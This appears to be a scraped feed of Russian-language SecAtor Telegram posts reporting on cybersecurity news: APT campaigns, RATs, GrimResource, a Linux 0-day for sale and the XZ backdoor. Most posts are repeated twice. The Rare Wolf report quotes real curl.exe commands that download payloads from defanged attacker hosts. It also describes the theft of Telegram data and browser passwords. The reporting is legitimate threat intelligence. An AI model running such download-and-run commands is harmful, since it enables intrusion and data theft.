͏Наконец-то дождались: рассекретили данные по проекту гигантской катапульты от SpinLaunch, с помощью которой админы канала SecAtor улетали на Марс.
Конечно, тогда Вы нам не верили, полагая бред, но тут подкатили пруфы.
Катапульта в форме диска имеет рычаг длиной 108 футов, который способен вращаться со скоростью 5000 миль в час, чего достаточно для отправки в космос небольших спутников.
Первый успешный запуск летательного аппарата в короткую суборбитальную миссию с помощью катапульты Suborbital Accelerator уже состоялся в 2022 году.
Плановые пуски намечены на 2026 и будут выводить спутники на низкую околоземную орбиту, не нагружая экологию в отличие от использования ракетного топлива.
Так что, кто куда, а мы снова на Марс.
Конечно, тогда Вы нам не верили, полагая бред, но тут подкатили пруфы.
Катапульта в форме диска имеет рычаг длиной 108 футов, который способен вращаться со скоростью 5000 миль в час, чего достаточно для отправки в космос небольших спутников.
Первый успешный запуск летательного аппарата в короткую суборбитальную миссию с помощью катапульты Suborbital Accelerator уже состоялся в 2022 году.
Плановые пуски намечены на 2026 и будут выводить спутники на низкую околоземную орбиту, не нагружая экологию в отличие от использования ракетного топлива.
Так что, кто куда, а мы снова на Марс.
͏Apple объявила о выпуске VisionOS 1.2, на которой работает та самая не оправдавшая надежд гарнитура VR Vision Pro, с исправлениями ряда уязвимостей, одну из которых называют реально «страшной».
Классифицированная как проблема DoS, в реальности представляет собой «первый пространственный дефект» и имеет гораздо более существенное влияние.
Обнаруживший уязвимость и сообщивший о ней Apple, исследователь Райан Пикрен отметил, что CVE-2024-27812 позворляет затмить видимое пользователем визуальное пространство пауками, летучими мышами или прочими гадостями.
Уязвимость CVE-2024-27812 связана с обработкой специально созданного веб-контента и, по мнению Apple, может привести к DoS-состоянию.
Vision Pro обеспечивает предотвращение запуска неавторизованных приложений и проникновения в личное пространство пользователя.
По умолчанию нативные приложения ограничены контекстом «общего пространства», где они действуют предсказуемо и их можно легко закрыть. «Полное пространство» доступно через явное разрешение от пользователя через приглашение на уровне ОС.
В частности, посещаемые в Safari через гарнитуру Vision Pro сайты, могут запускать 3D-объекты в комнате присутствия только в том случае, если пользователь предоставил им разрешение вручную.
Однако Пикрен обнаружил, что Apple не реализовала необходимый уровень защиты к ARKit Quick Look в iOS, так что функция все еще присутствует в WebKit и не требует никаких разрешений в Safari.
Злоумышленник может злоупотребить этой функцией для создания любого типа 3D-объектов, включая анимированные и звуковые объекты, просто заставляя целевого пользователя посетить вредоносный веб-сайт.
Причем поскольку эти анимированные файлы обрабатываются отдельным приложением (Quick Look), - закрытие Safari не приводит к их устранению.
А, учитывая отсутствие Dock у VisionOS или какого-либо другого пользовательского интерфейса открытых приложений, очевидного способа остановить работу этих объектов нет. Ничего не остается, как вручную физически нажимать на каждый из них.
Исследователь был очень удивлен тем, как Apple классифицировала проблему, отнеся ее к DoS вместо того, чтобы оценить ее на основе полного воздействия.
Как реализуется подобный взлом пространственных вычислений гарнитуры VR Пикрен продемонстрировал, создав пугающий сценарий, в котором в комнате появляются сотни движущихся пауков и визжащих летучих мышей.
Классифицированная как проблема DoS, в реальности представляет собой «первый пространственный дефект» и имеет гораздо более существенное влияние.
Обнаруживший уязвимость и сообщивший о ней Apple, исследователь Райан Пикрен отметил, что CVE-2024-27812 позворляет затмить видимое пользователем визуальное пространство пауками, летучими мышами или прочими гадостями.
Уязвимость CVE-2024-27812 связана с обработкой специально созданного веб-контента и, по мнению Apple, может привести к DoS-состоянию.
Vision Pro обеспечивает предотвращение запуска неавторизованных приложений и проникновения в личное пространство пользователя.
По умолчанию нативные приложения ограничены контекстом «общего пространства», где они действуют предсказуемо и их можно легко закрыть. «Полное пространство» доступно через явное разрешение от пользователя через приглашение на уровне ОС.
В частности, посещаемые в Safari через гарнитуру Vision Pro сайты, могут запускать 3D-объекты в комнате присутствия только в том случае, если пользователь предоставил им разрешение вручную.
Однако Пикрен обнаружил, что Apple не реализовала необходимый уровень защиты к ARKit Quick Look в iOS, так что функция все еще присутствует в WebKit и не требует никаких разрешений в Safari.
Злоумышленник может злоупотребить этой функцией для создания любого типа 3D-объектов, включая анимированные и звуковые объекты, просто заставляя целевого пользователя посетить вредоносный веб-сайт.
Причем поскольку эти анимированные файлы обрабатываются отдельным приложением (Quick Look), - закрытие Safari не приводит к их устранению.
А, учитывая отсутствие Dock у VisionOS или какого-либо другого пользовательского интерфейса открытых приложений, очевидного способа остановить работу этих объектов нет. Ничего не остается, как вручную физически нажимать на каждый из них.
Исследователь был очень удивлен тем, как Apple классифицировала проблему, отнеся ее к DoS вместо того, чтобы оценить ее на основе полного воздействия.
Как реализуется подобный взлом пространственных вычислений гарнитуры VR Пикрен продемонстрировал, создав пугающий сценарий, в котором в комнате появляются сотни движущихся пауков и визжащих летучих мышей.
͏Срочно в номер! Корабли лавировали, лавировали, да не вылавировали!
В смысле LockBit мочили, мочили, да не замочили. Объявленая несколько месяцев назад побежденной эта групировка RaaS не только отживела и снова стала ведущей бандой вымогателей в мире, но и ухитрилась распотрошить Федеральную резервную систему США (она же ФРС, она же The Fed, она же Центробанк США, она же главный и единственный станок по печати американских долларов).
И вынести оттуда 33 ТБ данных. Которые грозится опубликовать уже 25 июня.
Такого громкого взлома от рансомварщиков, пожалуй, еще не было. Интересно, заплатят или нет?
В смысле LockBit мочили, мочили, да не замочили. Объявленая несколько месяцев назад побежденной эта групировка RaaS не только отживела и снова стала ведущей бандой вымогателей в мире, но и ухитрилась распотрошить Федеральную резервную систему США (она же ФРС, она же The Fed, она же Центробанк США, она же главный и единственный станок по печати американских долларов).
И вынести оттуда 33 ТБ данных. Которые грозится опубликовать уже 25 июня.
Такого громкого взлома от рансомварщиков, пожалуй, еще не было. Интересно, заплатят или нет?
Исследователи Positive Technologies сообщают об активизации ExCobalt на российском направлении с помощью нового бэкдора GoRed на базе Golang.
Группировка ExCobalt сосредоточена на кибершпионаже и включает в себя несколько участников, действующих как минимум с 2016 года, из числа, предположительно, бывших членов банды Cobalt.
Cobalt атаковал финансовые учреждения с целью кражи средств, отличаясь задействованием инструмента CobInt, который последователи начали применять в 2022 году.
За последний год предпринятые злоумышленником в отношении РФ атаки были нацелены на различные сектора, включая госуправление, информационные технологии, металлургию, горнодобывающую промышленность и телекоммуникации.
Первоначальный доступ к средам реализуется через скомпрометированного подрядчика и атак на цепочку поставок, что отражает высокую степень сложности планируемых кампаний.
Методология работы ExCobalt предполагает использование различных инструментов, таких как Metasploit, Mimikatz, ProcDump, SMBExec, Spark RAT для выполнения команд на зараженных хостах, а также EoP-эксплойтов для Linux (CVE-2019-13272, CVE-2021-3156, CVE-2021- 4034 и CVE-2022-2586).
Претерпевший многочисленные изменения с момента своего создания GoRed представляет собой комплексный бэкдор, который позволяет операторам выполнять команды, собирать учетные данные и подробную информацию об активных процессах, сетевых интерфейсах и файловых системах.
Он использует протокол удаленного вызова процедур RPC для связи с C2.
Более того, он поддерживает ряд фоновых команд для поиска интересующих файлов и паролей, а также включения обратной оболочки. Собранные данные затем экспортируются в инфраструктуру, подконтрольную злоумышленнику.
ExCobalt продолжает демонстрировать высокий уровень активности в атаках на российские компании, постоянно добавляя в свой арсенал новые инструменты и совершенствуя методы.
При этом GoRed приобретает все новые возможности и функции по сбору данных жертвы, повышая скрытность как внутри зараженной системы, так и при взаимодействии с C2.
Кроме того, ExCobalt проявляет гибкость и универсальность, дополняя свой набор инструментов модифицированными стандартными утилитами, которые помогают группе легко обходить защиту и адаптироваться к ее изменениям, показывая глубокое понимание слабых сторон жертвы.
Группировка ExCobalt сосредоточена на кибершпионаже и включает в себя несколько участников, действующих как минимум с 2016 года, из числа, предположительно, бывших членов банды Cobalt.
Cobalt атаковал финансовые учреждения с целью кражи средств, отличаясь задействованием инструмента CobInt, который последователи начали применять в 2022 году.
За последний год предпринятые злоумышленником в отношении РФ атаки были нацелены на различные сектора, включая госуправление, информационные технологии, металлургию, горнодобывающую промышленность и телекоммуникации.
Первоначальный доступ к средам реализуется через скомпрометированного подрядчика и атак на цепочку поставок, что отражает высокую степень сложности планируемых кампаний.
Методология работы ExCobalt предполагает использование различных инструментов, таких как Metasploit, Mimikatz, ProcDump, SMBExec, Spark RAT для выполнения команд на зараженных хостах, а также EoP-эксплойтов для Linux (CVE-2019-13272, CVE-2021-3156, CVE-2021- 4034 и CVE-2022-2586).
Претерпевший многочисленные изменения с момента своего создания GoRed представляет собой комплексный бэкдор, который позволяет операторам выполнять команды, собирать учетные данные и подробную информацию об активных процессах, сетевых интерфейсах и файловых системах.
Он использует протокол удаленного вызова процедур RPC для связи с C2.
Более того, он поддерживает ряд фоновых команд для поиска интересующих файлов и паролей, а также включения обратной оболочки. Собранные данные затем экспортируются в инфраструктуру, подконтрольную злоумышленнику.
ExCobalt продолжает демонстрировать высокий уровень активности в атаках на российские компании, постоянно добавляя в свой арсенал новые инструменты и совершенствуя методы.
При этом GoRed приобретает все новые возможности и функции по сбору данных жертвы, повышая скрытность как внутри зараженной системы, так и при взаимодействии с C2.
Кроме того, ExCobalt проявляет гибкость и универсальность, дополняя свой набор инструментов модифицированными стандартными утилитами, которые помогают группе легко обходить защиту и адаптироваться к ее изменениям, показывая глубокое понимание слабых сторон жертвы.
ptsecurity.com
PT ESC Threat Intelligence
In this blog you can find information about current attacks by hacker groups worldwide, analysis of their tools, incident reports, threat actors' TTPs, indicators of compromise, and detection names in our products.
Securonix раскрывает незамысловатую фишинговую кампанию, нацеленную на Пакистан с использованием специального бэкдора.
Неизвестные злоумышленники получили название и отслеживаются ресерчерами как PHANTOM#SPIKE. Они использовали фишинговые документы на военную тематику для активации цепочки заражения.
Для развертывания вредоносного ПО PHANTOM#SPIKE использовали ZIP-файлы с защищенным паролем архивом полезной нагрузки.
Сама же замеченная кампания отличается отсутствием сложности и задействованием достаточно простых полезных данных для достижения удаленного доступа к целевым машинам.
Причем прилагаемый к сообщениям ZIP-архив якобы представляет собой протокол заседания, связанного с Международным форумом Армия-2024, который традиционно проводится Министерством обороны РФ.
В ZIP-файле присутствует скомпилированный Microsoft HTML-файл справки (CHM) и скрытый исполняемый файл (RuntimeIndexer.exe).
Первый из них при открытии отображает протокол собрания, а также пару изображений. Но при этом как только пользователь щелкнет в любом месте документа, скрытно запускается двоичный файл.
Исполняемый файл предназначен для работы в качестве бэкдора, который устанавливает соединения с удаленным сервером через TCP для получения команд, которые впоследствии выполняются на скомпрометированном хосте.
Помимо передачи системной информации, выполняет команды через cmd.exe, собирает выходные данные операции и передает их обратно на сервер.
Реализует такие команды, как systeminfo, Tasklist, Curl для извлечения общедоступного IP-адреса с помощью ip-api[.]com и schtasks для настройки постоянства.
Бэкдор по сути функционирует как троян удаленного доступа (RAT) на основе командной строки, который предоставляет злоумышленнику постоянный, скрытый и безопасный доступ к зараженной системе.
Возможность удаленно выполнять команды и передавать результаты обратно на C2 позволяет злоумышленнику контролировать зараженную систему, красть конфиденциальную информацию и доставлять дополнительные полезные нагрузки.
Неизвестные злоумышленники получили название и отслеживаются ресерчерами как PHANTOM#SPIKE. Они использовали фишинговые документы на военную тематику для активации цепочки заражения.
Для развертывания вредоносного ПО PHANTOM#SPIKE использовали ZIP-файлы с защищенным паролем архивом полезной нагрузки.
Сама же замеченная кампания отличается отсутствием сложности и задействованием достаточно простых полезных данных для достижения удаленного доступа к целевым машинам.
Причем прилагаемый к сообщениям ZIP-архив якобы представляет собой протокол заседания, связанного с Международным форумом Армия-2024, который традиционно проводится Министерством обороны РФ.
В ZIP-файле присутствует скомпилированный Microsoft HTML-файл справки (CHM) и скрытый исполняемый файл (RuntimeIndexer.exe).
Первый из них при открытии отображает протокол собрания, а также пару изображений. Но при этом как только пользователь щелкнет в любом месте документа, скрытно запускается двоичный файл.
Исполняемый файл предназначен для работы в качестве бэкдора, который устанавливает соединения с удаленным сервером через TCP для получения команд, которые впоследствии выполняются на скомпрометированном хосте.
Помимо передачи системной информации, выполняет команды через cmd.exe, собирает выходные данные операции и передает их обратно на сервер.
Реализует такие команды, как systeminfo, Tasklist, Curl для извлечения общедоступного IP-адреса с помощью ip-api[.]com и schtasks для настройки постоянства.
Бэкдор по сути функционирует как троян удаленного доступа (RAT) на основе командной строки, который предоставляет злоумышленнику постоянный, скрытый и безопасный доступ к зараженной системе.
Возможность удаленно выполнять команды и передавать результаты обратно на C2 позволяет злоумышленнику контролировать зараженную систему, красть конфиденциальную информацию и доставлять дополнительные полезные нагрузки.
Securonix
Analysis of PHANTOM#SPIKE: Attackers Leveraging CHM Files to Run Custom CSharp Backdoors Likely Targeting Victims Associated with…
The Securonix Threat Research (STR) team has identified the use of a stealthy backdoor payload likely targeting Pakistani victims via unsolicited messages.
Исследователи Cisco Talos сообщают об обнаружении масштабной шпионской кампании в отношении правительственных учреждений в Европе, Африке, Азии и на Ближнем Востоке, которую они приписывают неизвестной китайской APT SneakyChef.
Китайские хакеры активны как минимум с августа 2023 года и задействуют SpiceRAT и SugarGh0st, а также приманки в виде сканов документы правительственных учреждений, большинство из которых связаны с министерствами иностранных дел или посольствами различных стран.
Впервые активность APT была освещена еще в конце ноября 2023 года в связи с серией атак на Южную Корею и Узбекистан с использованием специального варианта Gh0st RAT под названием SugarGh0st.
Кроме того, про использование SugarGh0st RAT в отношении американских компаний в области ИИ и научных учреждений также сообщала Proofpoint в прошлом месяце, отлеживая кластер угроз как UNK_SweetSpecter.
Отдельно следует упомянуть, что SneakyChef ресерчерами также увязывается со кампанией Operation Diplomatic Spectre, которую подробно анализировала Palo Alto Networks Unit 42.
С тех пор Talos наблюдала, как одно и то же вредоносное ПО использовалось для атаки на различные правительственные учреждения в Анголе, Индии, Латвии, Саудовской Аравии и Туркменистане с использованием целевых фишинговых рассылок.
Помимо использования цепочек атак с файлами LNK, встроенными в архивы RAR, для доставки SugarGh0st, новая волна задействует самораспаковывающийся архив RAR (SFX) в качестве начального вектора заражения для запуска VBS, который в конечном итоге запускает вредоносное ПО с помощью загрузчика и одновременно отображает файл-приманку.
При этом атаки на Анголу отметились тем, что в них применялся новый троян удаленного доступа под названием SpiceRAT, а качестве приманки - русскоязычная газета Нейтральный Туркменистан.
SpiceRAT, в свою очередь, использует для распространения две разные цепочки заражения, одна из которых - это файл LNK, присутствующий в архиве RAR, который развертывает вредоносное ПО с использованием методов боковой загрузки DLL.
Второй вариант предполагает использование HTML-приложения (HTA), которое реализует пакетный сценарий Windows и двоичный файл загрузчика в кодировке Base64.
Пакетный сценарий также предназначен и для запуска другого исполняемого файла ChromeDriver.exe каждые 10 минут, который загружает вредоносную DLL, которая, в свою очередь, доставляет SpiceRAT. Каждый из этих компонентов — ChromeDriver.exe, DLL и полезная нагрузка RAT — извлекаются из ZIP-архива, полученного двоичным файлом загрузчика с удаленного сервера.
SpiceRAT также использует технику боковой загрузки DLL для запуска загрузчика DLL, который записывает список запущенных процессов, чтобы проверить, отлаживается ли он, с последующим запуском основного модуля из памяти.
Благодаря возможности загружать и запускать исполняемые двоичные файлы и произвольные команды SpiceRAT значительно увеличивает поверхность атаки на сеть жертвы, открывая путь для дальнейших атак.
Индикаторы компрометации, связанные с этой угрозой, можно найти здесь.
Китайские хакеры активны как минимум с августа 2023 года и задействуют SpiceRAT и SugarGh0st, а также приманки в виде сканов документы правительственных учреждений, большинство из которых связаны с министерствами иностранных дел или посольствами различных стран.
Впервые активность APT была освещена еще в конце ноября 2023 года в связи с серией атак на Южную Корею и Узбекистан с использованием специального варианта Gh0st RAT под названием SugarGh0st.
Кроме того, про использование SugarGh0st RAT в отношении американских компаний в области ИИ и научных учреждений также сообщала Proofpoint в прошлом месяце, отлеживая кластер угроз как UNK_SweetSpecter.
Отдельно следует упомянуть, что SneakyChef ресерчерами также увязывается со кампанией Operation Diplomatic Spectre, которую подробно анализировала Palo Alto Networks Unit 42.
С тех пор Talos наблюдала, как одно и то же вредоносное ПО использовалось для атаки на различные правительственные учреждения в Анголе, Индии, Латвии, Саудовской Аравии и Туркменистане с использованием целевых фишинговых рассылок.
Помимо использования цепочек атак с файлами LNK, встроенными в архивы RAR, для доставки SugarGh0st, новая волна задействует самораспаковывающийся архив RAR (SFX) в качестве начального вектора заражения для запуска VBS, который в конечном итоге запускает вредоносное ПО с помощью загрузчика и одновременно отображает файл-приманку.
При этом атаки на Анголу отметились тем, что в них применялся новый троян удаленного доступа под названием SpiceRAT, а качестве приманки - русскоязычная газета Нейтральный Туркменистан.
SpiceRAT, в свою очередь, использует для распространения две разные цепочки заражения, одна из которых - это файл LNK, присутствующий в архиве RAR, который развертывает вредоносное ПО с использованием методов боковой загрузки DLL.
Второй вариант предполагает использование HTML-приложения (HTA), которое реализует пакетный сценарий Windows и двоичный файл загрузчика в кодировке Base64.
Пакетный сценарий также предназначен и для запуска другого исполняемого файла ChromeDriver.exe каждые 10 минут, который загружает вредоносную DLL, которая, в свою очередь, доставляет SpiceRAT. Каждый из этих компонентов — ChromeDriver.exe, DLL и полезная нагрузка RAT — извлекаются из ZIP-архива, полученного двоичным файлом загрузчика с удаленного сервера.
SpiceRAT также использует технику боковой загрузки DLL для запуска загрузчика DLL, который записывает список запущенных процессов, чтобы проверить, отлаживается ли он, с последующим запуском основного модуля из памяти.
Благодаря возможности загружать и запускать исполняемые двоичные файлы и произвольные команды SpiceRAT значительно увеличивает поверхность атаки на сеть жертвы, открывая путь для дальнейших атак.
Индикаторы компрометации, связанные с этой угрозой, можно найти здесь.
Cisco Talos Blog
SneakyChef espionage group targets government agencies with SugarGh0st and more infection techniques
Cisco Talos recently discovered an ongoing campaign from SneakyChef, a newly discovered threat actor using SugarGh0st malware, as early as August 2023.
Forwarded from Russian OSINT
This media is not supported in your browser
VIEW IN TELEGRAM
🇺🇸Джулиан Ассанж заключил сделку с США о признании своей вины, чтобы выйти на свободу
Джулиан Ассанж планирует признать себя виновным в рамках сделки с👮 Министерством юстиции США, которая позволит ему выйти на свободу после 5 лет нахождения в британской тюрьме. Ожидается, что он вернется в Австралию.
🤕 Ассанж предстанет перед судом и будет приговорен всего к 62 месяцам с учетом времени пребывания в британской тюрьме, что означает - теперь он свободный человек и может беспрепятственно вернуться в Австралию, где он родился. Сделка о признании вины в скором времени должна быть одобрена федеральным судьей.
- сообщает Wikileaks.
- говорится в заявлении пресс-секретаря Совета национальной безопасности Уотсона.
✋ @Russian_OSINT
Джулиан Ассанж планирует признать себя виновным в рамках сделки с
Ассанж был обвинен в рамках уголовного дела - что обычно означает признание вины - в сговоре с целью получения и разглашения информации о национальной обороне, говорится в судебных документах.
Американские обвинения против Ассанжа связаны с одной из крупнейших в истории США публикаций секретной информации, которая произошла во время первого срока президента Барака Обамы. По версии правительства, начиная с конца 2009 года Ассанж вступил в сговор с аналитиком военной разведки Челси Мэннинг, чтобы использовать свой сайт WikiLeaks для обнародования десятков тысяч отчетов о деятельности в Афганистане, сотен тысяч отчетов о войне в Ираке, сотен тысяч депеш Госдепартамента и аналитических справок о заключенных в американском лагере Гуантанамо на Кубе.
После более чем пяти лет в камере размером 2х3 метра, изолированной 23 часа в сутки, он вскоре воссоединится со своей женой Стеллой Ассанж и их детьми, которые знали своего отца только из-за решетки.
- сообщает Wikileaks.
"Это независимое решение, принятое Министерством юстиции, и Белый дом не принимал никакого участия в принятии решения о признании вины"
- говорится в заявлении пресс-секретаря Совета национальной безопасности Уотсона.
Please open Telegram to view this post
VIEW IN TELEGRAM
Новый метод выполнения команд, получивший название GrimResource, использует специально созданную MSC (Microsoft Saved Console) и неисправленный недостаток Windows XSS для выполнения кода через консоль управления Microsoft.
В июле 2022 года Microsoft по умолчанию отключила макросы в Office, что заставило злоумышленников экспериментировать с новыми типами файлов при фишинговых атаках.
Злоумышленники сначала переключились на образы ISO и ZIP-файлы, защищенные паролем, поскольку это позволяло обходить флаги Mark of the Web (MoTW).
После того, как Microsoft исправила эту проблему с ISO, а 7-Zip добавил возможность распространять флаги MoTW, злоумышленники были вынуждены переключиться на новые вложения - ярлыки Windows и файлы OneNote.
Теперь же они теперь перешли на новый тип файлов — файлы Windows MSC (.msc), которые используются в консоли управления Microsoft (MMC) для управления различными аспектами ОС или создания пользовательских представлений часто используемых инструментов.
Впервые злоупотребления файлами MSC для развертывания вредоносного ПО сообщила южнокорейская Genian. Затем к ним присоединась Elastic.
Исследователи обнаружили новый метод распространения MSC и злоупотребление старой, но не исправленной уязвимостью Windows XSS (даже в последней версии Windows 11) в apds.dll, которая позволяет выполнять произвольный код JavaScript через созданный URL-адрес.
Об уязвимости было сообщено Adobe и Microsoft в октябре 2018 года, и даже после расследования, Microsoft определила, что данный случай не соответствует критериям немедленного (и вообще) устранения.
Вредоносный файл MSC содержит ссылку на уязвимый ресурс APDS в разделе StringTable, поэтому, когда цель открывает его, MMC обрабатывает его и запускает выполнение JS в контексте «mmc.exe».
Уязвимость XSS можно объединить с методом DotNetToJScript для выполнения произвольного кода .NET через движок JavaScript в обход любых существующих мер безопасности.
Причем Elastic нашла образец («sccm-updater.msc»), использующий GrimResource, который был загружен на VirusTotal 6 июня 2024 года.
Так что, судя по всему метод активно используется в реальных условиях. Что еще хуже, ни один антивирусный механизм VirusTotal в итоге не пометил его как вредоносный.
Несмотря на то, что именно в этой кампании метод используется для развертывания Cobalt Strike и первоначального доступа к сетям, его также можно задействовать для выполнения других команд.
Elastic Security опубликовала полный список индикаторов GrimResource на GitHub и предоставила правила YARA для обнаружения подозрительных файлов MSC.
В июле 2022 года Microsoft по умолчанию отключила макросы в Office, что заставило злоумышленников экспериментировать с новыми типами файлов при фишинговых атаках.
Злоумышленники сначала переключились на образы ISO и ZIP-файлы, защищенные паролем, поскольку это позволяло обходить флаги Mark of the Web (MoTW).
После того, как Microsoft исправила эту проблему с ISO, а 7-Zip добавил возможность распространять флаги MoTW, злоумышленники были вынуждены переключиться на новые вложения - ярлыки Windows и файлы OneNote.
Теперь же они теперь перешли на новый тип файлов — файлы Windows MSC (.msc), которые используются в консоли управления Microsoft (MMC) для управления различными аспектами ОС или создания пользовательских представлений часто используемых инструментов.
Впервые злоупотребления файлами MSC для развертывания вредоносного ПО сообщила южнокорейская Genian. Затем к ним присоединась Elastic.
Исследователи обнаружили новый метод распространения MSC и злоупотребление старой, но не исправленной уязвимостью Windows XSS (даже в последней версии Windows 11) в apds.dll, которая позволяет выполнять произвольный код JavaScript через созданный URL-адрес.
Об уязвимости было сообщено Adobe и Microsoft в октябре 2018 года, и даже после расследования, Microsoft определила, что данный случай не соответствует критериям немедленного (и вообще) устранения.
Вредоносный файл MSC содержит ссылку на уязвимый ресурс APDS в разделе StringTable, поэтому, когда цель открывает его, MMC обрабатывает его и запускает выполнение JS в контексте «mmc.exe».
Уязвимость XSS можно объединить с методом DotNetToJScript для выполнения произвольного кода .NET через движок JavaScript в обход любых существующих мер безопасности.
Причем Elastic нашла образец («sccm-updater.msc»), использующий GrimResource, который был загружен на VirusTotal 6 июня 2024 года.
Так что, судя по всему метод активно используется в реальных условиях. Что еще хуже, ни один антивирусный механизм VirusTotal в итоге не пометил его как вредоносный.
Несмотря на то, что именно в этой кампании метод используется для развертывания Cobalt Strike и первоначального доступа к сетям, его также можно задействовать для выполнения других команд.
Elastic Security опубликовала полный список индикаторов GrimResource на GitHub и предоставила правила YARA для обнаружения подозрительных файлов MSC.
www.genians.co.kr
페이스북과 MS관리콘솔을 활용한 Kimsuky APT 공격 발견
지니언스 시큐리티 센터는 Kimsuky APT 그룹이 새로운 공격 전략을 도입한 것을 발견했습니다.이번 APT 공격은 페이스북(Facebook) 서비스가 초기 침투에 활용됐습니다.
Исследователи BI.ZONE сообщают о новой кампании со стороны группировки Rare Wolf, связанной с распространением легитимного ПО для удаленного контроля деятельности сотрудника на рабочем месте Mipko Employee Monitor.
Как выяснили исследователи, в начале июня ненадеванная жертва получила фишинговое электронное письмо, во вложении к которому находился исполняемый файл в виде документа с тактико-техническими требованиями Проект ТТТ 26.2024.scr.
При его запуске происходила компрометация целевой машины пока пользователь лицезрел «ожидаемый» отвлекающий документ.
В реальности с удаленного сервера загружались архивы с дополнительными инструментами:
- C:\Intel\curl.exe -o C:\Intel\keys.rar hxxp://hostingforme[.]nl/down/keys.rar
- C:\Intel\curl.exe -o C:\Intel\MPK.rar hxxp://hostingforme[.]nl/down/MPK.rar
- C:\Intel\curl.exe -o C:\Intel\pas.rar hxxp://hostingforme[.]nl/down/pas.rar
Затем загружался исполняемый файл, который расшифровывал полученные архивы: C:\Intel\curl.exe -o C:\Intel\driver.exe hxxp://supersuit[.]site/down/driver.exe.
На подконтрольную злоумышленником почту посредством программы Blat отправлялись файлы, имена которых подходили под маски *.doc*, *.pdf*, а также все файлы из папки AppData\Roaming\Telegram Desktop\tdata.
Производился сбор паролей из браузеров в текстовый файл password.txt, далее он также отправлялся на почту злоумышленника.
И, наконец, устанавливалось ПО Mipko Employee Monitor, позволяющее злоумышленнику взаимодействовать со скомпрометированной системой, в том числе закрепляться через ветку реестра Software\Microsoft\Windows\CurrentVersion\Run.
Подробно о группировке Rare Wolf исследователи сообщали в отчете от ноября 2023 года, где представлены необходимые IoC, а также MITRE ATT&CK.
Как выяснили исследователи, в начале июня ненадеванная жертва получила фишинговое электронное письмо, во вложении к которому находился исполняемый файл в виде документа с тактико-техническими требованиями Проект ТТТ 26.2024.scr.
При его запуске происходила компрометация целевой машины пока пользователь лицезрел «ожидаемый» отвлекающий документ.
В реальности с удаленного сервера загружались архивы с дополнительными инструментами:
- C:\Intel\curl.exe -o C:\Intel\keys.rar hxxp://hostingforme[.]nl/down/keys.rar
- C:\Intel\curl.exe -o C:\Intel\MPK.rar hxxp://hostingforme[.]nl/down/MPK.rar
- C:\Intel\curl.exe -o C:\Intel\pas.rar hxxp://hostingforme[.]nl/down/pas.rar
Затем загружался исполняемый файл, который расшифровывал полученные архивы: C:\Intel\curl.exe -o C:\Intel\driver.exe hxxp://supersuit[.]site/down/driver.exe.
На подконтрольную злоумышленником почту посредством программы Blat отправлялись файлы, имена которых подходили под маски *.doc*, *.pdf*, а также все файлы из папки AppData\Roaming\Telegram Desktop\tdata.
Производился сбор паролей из браузеров в текстовый файл password.txt, далее он также отправлялся на почту злоумышленника.
И, наконец, устанавливалось ПО Mipko Employee Monitor, позволяющее злоумышленнику взаимодействовать со скомпрометированной системой, в том числе закрепляться через ветку реестра Software\Microsoft\Windows\CurrentVersion\Run.
Подробно о группировке Rare Wolf исследователи сообщали в отчете от ноября 2023 года, где представлены необходимые IoC, а также MITRE ATT&CK.
BI.ZONE
Rare Wolf охотится за приватными данными с помощью фальшивых накладных «1С:Предприятие»
Как злоумышленникам удается отвлечь внимание жертв и оставаться незаметными в инфраструктуре — читайте в новом исследовании
͏Некто Cas на одной известной площадке, предположительно, располагает 0-Day UAF в ядре Linux, который можно использовать для выполнения привилегированного кода в версии 6.6.15-amd64.
Сие хакерское удовольствие доступно по цене в 150 тысяч долларов США в расчете на Monero или BTC. Обращаться следует при наличии соответствующего депозита.
Никакой дополнительной контактной информации не предоставлено, но посредником выступает никто иной как IntelBroker.
Сие хакерское удовольствие доступно по цене в 150 тысяч долларов США в расчете на Monero или BTC. Обращаться следует при наличии соответствующего депозита.
Никакой дополнительной контактной информации не предоставлено, но посредником выступает никто иной как IntelBroker.
Ресерчеры из Лаборатории Касперского выкатила новый отчет из серии исследований в отношении резонансного инцидента с бэкдором в бэкдора в XZ Utils.
В первой части была подробна изучена хронология и представлен общий анализ бэкдора, основное внимание во второй уделялось изощрённым социнженерным аспектам инцидента.
В новом исследовании ЛК детально изучен перехватчик функций, используемых в OpenSSH, обнаружив в нём несколько новаторских решений.
Злоумышленник установил функцию предотвращения повторного воспроизведения (anti-replay), чтобы избежать возможного перехвата бэкдора или связи.
Разработчик бэкдора XZ Utils применил специальную технику стеганографии в коде x86, чтобы скрыть прямо в коде открытый ключ шифрования, по технологии, схожей с ROP.
Бэкдор скрывает журналы несанкционированных подключений к SSH-серверу, подключая функцию журналирования.
Бэкдор перехватывает функцию аутентификации по паролю, что позволяет злоумышленнику использовать любое имя пользователя и пароль для входа на зараженный сервер без каких-либо дополнительных проверок.
Аналогичное реализуется и для аутентификации с открытым ключом.
Кроме того, он обладает возможностями удаленного выполнения кода, которые позволяют злоумышленнику выполнить любую системную команду на зараженном сервере.
В целом, можно сделать вывод, что бэкдор XZ Utils действительно весьма сложная и уникальная угроза со множеством особенностей и весьма непростой долгоиграющей кампанией социнженерии.
При этом группа или злоумышленник, стоящий за ней, обладает обширными знаниями внутреннего устройства проектов с открытым исходным кодом, таких как SSH и libc, а также серьезным опытом в обфускации кода для запуска заражения.
В первой части была подробна изучена хронология и представлен общий анализ бэкдора, основное внимание во второй уделялось изощрённым социнженерным аспектам инцидента.
В новом исследовании ЛК детально изучен перехватчик функций, используемых в OpenSSH, обнаружив в нём несколько новаторских решений.
Злоумышленник установил функцию предотвращения повторного воспроизведения (anti-replay), чтобы избежать возможного перехвата бэкдора или связи.
Разработчик бэкдора XZ Utils применил специальную технику стеганографии в коде x86, чтобы скрыть прямо в коде открытый ключ шифрования, по технологии, схожей с ROP.
Бэкдор скрывает журналы несанкционированных подключений к SSH-серверу, подключая функцию журналирования.
Бэкдор перехватывает функцию аутентификации по паролю, что позволяет злоумышленнику использовать любое имя пользователя и пароль для входа на зараженный сервер без каких-либо дополнительных проверок.
Аналогичное реализуется и для аутентификации с открытым ключом.
Кроме того, он обладает возможностями удаленного выполнения кода, которые позволяют злоумышленнику выполнить любую системную команду на зараженном сервере.
В целом, можно сделать вывод, что бэкдор XZ Utils действительно весьма сложная и уникальная угроза со множеством особенностей и весьма непростой долгоиграющей кампанией социнженерии.
При этом группа или злоумышленник, стоящий за ней, обладает обширными знаниями внутреннего устройства проектов с открытым исходным кодом, таких как SSH и libc, а также серьезным опытом в обфускации кода для запуска заражения.
Securelist
XZ backdoor behavior inside OpenSSH
